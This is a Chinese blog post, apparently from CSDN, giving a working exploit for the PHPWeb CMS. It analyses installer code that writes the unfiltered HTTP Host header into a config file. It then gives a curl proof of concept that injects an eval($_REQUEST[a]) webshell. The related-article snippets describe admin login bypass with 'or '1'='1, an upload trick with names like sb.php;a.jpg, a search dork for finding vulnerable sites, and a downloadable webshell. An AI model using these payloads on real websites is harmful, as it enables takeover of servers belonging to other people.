phpweb成品网站最新版(注入、上传、写shell)

最新推荐文章于 2024-06-08 10:58:37 发布
最新推荐文章于 2024-06-08 10:58:37 发布
阅读量499 收藏
点赞数
文章标签: shell php 数据库

注入:
之所以鸡肋就是该漏洞利用安装文件 重新生成 配置文件 写入可执行代码

鸡肋1: 具有破坏性 动作非常大 重新写了配置文件 数据库连接文件
鸡肋2: 有一定安全常识的站长都会删掉 install 目录

虽然鸡肋 但也有优点 : 不受 magic_quotes_gpc 、 webserver 影响

分析:

$siteurl="http://".$_SERVER["HTTP_HOST"]."/"; //未过滤
 
$filestr = fread(fopen($SysConfigFile, 'r'),30000);
$filestr=str_replace(" ","",$filestr);
$filestr=str_replace("DefaultDbHost",$dbhost,$filestr);
$filestr=str_replace("DefaultDbName",$dbname,$filestr);
$filestr=str_replace("DefaultDbUser",$dbuser,$filestr);
$filestr=str_replace("DefaultDbPass",$dbpwd,$filestr);
$filestr=str_replace("DefaultsLan","zh_cn",$filestr);
$filestr=str_replace("DefaultTablePre",$tablepre,$filestr);
$filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr);
 
fwrite(fopen($ConFile,"w"),$filestr,30000);

$_SERVER["HTTP_HOST"] 就是 http head 中HOST传递过来的 可控制,并且不受 magic_quotes_gpc 影响 ^ _ ^

poc

curl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"

 

weixin_33829657
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpweb后台拿shell方法
番薯道长的博客
11-19 7971
首先登录后台admin.php(默认后台admin.php) 有的phpweb网站存在万能密码登录 帐号密码都输入:admin 'or '1'='1直接登录 登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把www.xxx.com 改成你的目标网站地址。  然后选择你的马儿再上后如果为iis6,就点击查
oracleshell执行新医保数据转换后台
viviliving的专栏
03-20 237
select LinxRUNCMD('/data05/sql/exec.sh /data05/sql/test.sql') cmd from dual; exec.sh #!/usr/bin/bash source ~/.bash_profile echo $1 date>$1.log /usr/bin/nohup /u01/app/oracle/product/12.1.0/db_1/bin/sqlplus hsa_lzjbsi/hsa_lzjbsi@192.168.217.192/OR.
php web sql注入,PHPWEB多处SQL注入漏洞打包
weixin_39933336的博客
03-18 412
漏洞概要缺陷编号:WooYun-2013-034900漏洞标题:PHPWEB多处SQL注入漏洞打包相关厂商:phpweb漏洞作者:只发通用型提交时间:2013-08-21 16:02公开时间:2013-11-19 16:02漏洞类型:SQL注射漏洞危害等级:高自评Rank:15漏洞状态:未联系到厂商或者厂商积极忽略Tags标签:漏洞详情披露状态:2013-08-21: 积极联系厂商并且等待厂商认领...
Web大学生网页作业成品——仿腾讯游戏官网网站设计与实现(HTML+CSS+JavaScript)
最新发布
专注于dreamweaver网页设计制作
06-08 1461
🎮游戏官网、⛹️游戏网站、🕹️电竞游戏、🎴游戏介绍、等网站的设计与制作。⭐ 网页中包含:Div+CSS、鼠标滑过特效、Table、导航栏效果、banner、表单、二级三级页面等,视频音频元素,同时设计了logo(源文件),基本期末作业所需的知识点全覆盖。🏅 一套A+的网页应该包含 (具体可根据个人要求而定)📔网站布局方面:计划采用目前主流的、能兼容各大主流浏览器、显示效果稳定的浮动网页布局结构。📓网站程序方面:计划采用最新的网页编程语言HTML5+CSS3+JS程序语言完成网站的功能设计。并确保
[漏洞复现]phpweb 前台任意文件上漏洞
weixin_44508748的博客
04-22 2487
环境搭建 phpweb环境搭建很简单,基本就是下一步下一步点点点就可以了。 搭建前需要创建好phpweb对应数据库,如图: 然后前台下一步下一步一直点,安装成功: 前台:http://192.168.242.128/phpweb/3151/ 后台:http://192.168.242.128/phpweb/3151/admin.php 复现: 漏洞位于./base/appplus.php文件下...
php 商城漏洞,爆PHPWeb成品网站超市最新注入漏洞
weixin_35569158的博客
03-29 272
今天早上去乌云逛的时候,看到西部数码分站被爆注入,于是就关注了一下。然后到下午没想到就公开了,一看原来是phpweb成品网站超市。西部数码说是第三方就忽略了,蛋疼。你这忽略想我就想到,既然你们西部有那其他的网站也应该有,于是邪恶测试phpweb官网,存在啊。既然没有修复,我就发一下,可能很多大牛,已经放着有了,没有发出来,自己内部在玩。百度看了看,2010年的时候爆过一个注入,貌似修复了。http...
phpweb成品网站商业版:网上订餐系统
11-01
**phpWeb成品网站商业版网上订餐系统** phpWeb成品网站商业版网上订餐系统是一款专为餐饮行业设计的高效管理工具,集成了在线订餐、会员管理、充值功能以及积分兑换等多种服务,旨在帮助餐厅提升运营效率,优化客户...
PHPweb成品网站排版去phpweb排版功能
05-05
还在为phpweb后台的排版功能而烦恼嘛? 辛苦排版出来的网站,给客户做出的网站,担心别人打乱排版而烦恼嘛? 使用方法,直接解压后覆盖根目录,建议先备份原文件! 如何恢复? 把覆盖的两个文件 用原先模板里的...
phpweb 成品网站 4205
03-11
phpweb 成品网站 4205 [安装环境要求] 虚拟主机或在自备服务器中开设好的主机空间,主机环境要求: PHP4.3-5.x/非安全模式/允许WEB文件上 MYSQL4.2-5.x zend optimizer 3.2以上 上后,安装直接进入网站安装:...
phpweb 514打包免费下载 phpweb成品网站源码打包下载
07-06
phpweb 514打包免费下载 phpweb成品网站源码打包下载 由于不能上源码 故提供下载地址 供大家下载
phpweb 成品网站 3100
03-11
PHP4.3-5.x/非安全模式/允许WEB文件上 MYSQL4.2-5.x zend optimizer 3.2以上 上后,安装直接进入网站安装:http://您的域名/ [安装方法] 1、下载安装包,将安装包下载解压后,将全部文件和目录上网站空间...
phpweb通用上漏洞
05-16
phpweb通用上漏洞 一键GETshell 不用多解释了
php webshell 下载(自测 功能强大齐全的php版webshell
06-30
声明:本PHP-webshell仅供学习交流以及网站安全检测之用,功能过于强大,请不要用过非法用途,否则一切后果由使用者本人承担! 使用方法:上网站任意目录连接即可。无需更改任何。(自测功能完整,无任何阉割,不接黑)
phpweb完美解决不能上图片
10-12
完美解决phpweb后台不能上图片,只需要覆盖根目录下的admin文件就可以了
PHP源码(网站打包及解压工具)网站解压打包工具,站长福音
06-20
PHP源码(网站打包及解压工具)网站解压打包工具,站长福音
phpweb如何上大文件视频上
03-21
具体思路:登陆PHPWEB后台,视频模块后台,创建新发布视频文件,上一个很小很小的视频文件(可以自己桌面新建一个视频文件,或者新建一个txt文件进行改后缀),发布成功后找到对应视频路径,利用FTP软件登录,进行文件替换即可。
php 商城漏洞,phpweb成品网站全版本通杀注入漏洞
weixin_32187075的博客
03-29 330
关键字:inurl:webmall/detail.php?id数据表:pwn_base_admin关于拿shell首先登录后台admin.php看了upload.php源码,分析了一个下午,然后大约是明白了虽然上那里只允许上gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的...
phpweb后台拿shell简单方法
sxf_123456的博客
04-24 5935
关于phpweb后台拿shell简单方法。   首先登录后台admin.php   登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地址。    代码文件如下:             然后选择你的马儿再上   上后如果为iis
2018最新各大网站软件提交入口 |软件发布
热门推荐
双彩飞扬的博客
09-18 1万+
天空软件站软件发布 http://member.skycn.com/update_send.php 华军软件园 http://sq2.onlinedown.net/submit/ 至顶网下载 http://down.zdnet.com.cn/user_publish.php IT168下载频道 http://download.it168.com/files/uploadsoft.asp 太平洋电...
命令注入讲解ppt.pptx
08-10
1997年,挪威程序员首次发现了这种攻击,起初以Shell命令注入的形式出现。SQL注入是命令注入的一种变体,但它们的焦点不同:SQL注入涉及的是数据库查询语句,而命令注入则针对操作系统命令。PHP命令注入也是一个常见...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值